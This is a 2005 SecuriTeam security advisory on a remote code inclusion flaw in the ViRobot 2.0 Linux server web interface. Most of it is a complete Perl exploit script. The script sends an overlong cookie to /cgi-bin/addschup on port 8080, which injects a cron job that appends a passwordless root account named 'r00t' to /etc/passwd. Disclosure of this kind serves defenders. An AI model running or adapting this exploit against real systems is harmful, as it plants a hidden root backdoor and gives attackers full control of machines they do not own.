The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
ViRobot Remote Code Inclusion (Exploit)
------------------------------------------------------------------------
SUMMARY
" <http://www.hauri.net/> ViRobot is a resource-thrifty scanner that lets
you do a full scan quickly while you work. Scheduled scan and update
wizards make it easy to keep your PC clean and your antivirus protection
up to date."
Flaws in ViRobot UNIX/Linux Server web user interface allows remote code
inclusion, the following exploit code will add r00t login to a vulnerable
system, in addition this user will also have root privileges.
DETAILS
Vulnerable Systems:
* ViRobot version 2.0
Exploit:
#!/usr/bin/perl
# ViRobot 2.0 remote cookie exploit - ala addschup
# copyright Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# jdam:/home/kfinisterre# ls -al /var/spool/cron/root
# ls: /var/spool/cron/root: No such file or directory
# jdam:/home/kfinisterre# ls -al /var/spool/cron/root
# -rw-r--r-- 1 root staff 104 2005-01-23 14:43 /var/spool/cron/root
#
# We control the 6th paramater passed to an fprintf call.
#
# 0x804a740 <_IO_stdin_used+572>: "%s %s %s %s %s %s/%s/vrupdate -s >
/dev/null 2>&1\n"
#
# * * * * * /bin/echo r00t::0:0:root:/root:/bin/bash >> /etc/passwd
&/ViRobot/vrupdate -s > /dev/null 2>&1
use IO::Socket;
$hostName = $ARGV[0];
$sock = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $hostName,
PeerPort => 8080,
Type => SOCK_STREAM
);
if (! $sock)
{
print "[*] Error, could not connect to the remote host: $!\n";
exit (0);
}
$target = "/cgi-bin/addschup";
$crondata = "/bin/echo r00t::0:0:root:/root:/bin/bash >> /etc/passwd &";
$postbody = "POST $target HTTP/1.1\n" .
"Host: localhost:8080\n" .
"User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.3)
Gecko/20041007 Debian/1.7.3-5\n" .
"Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n" .
"Accept-Encoding: gzip,deflate\n" .
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n" .
"Keep-Alive: 300\n" .
"Connection: keep-alive\n" .
"Content-type: application/x-www-form-urlencoded\n" .
"Content-length: 1\n" .
"Cookie: ViRobot_ID=" . "A" x 32 . "$crondata\n";
print $sock $postbody;
close ($sock);
exit (0);
ADDITIONAL INFORMATION
The information has been provided by
<mailto:kf_lists@digitalmunition.com> Kevin Finisterre.
The original article can be found at:
<http://www.digitalmunition.com/DMA%5B2005-0614a%5D.txt>
http://www.digitalmunition.com/DMA%5B2005-0614a%5D.txt
The original article can be found at:
<http://www.digitalmunition.com/virobot_ex.pl>
http://www.digitalmunition.com/virobot_ex.pl
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
No comments:
Post a Comment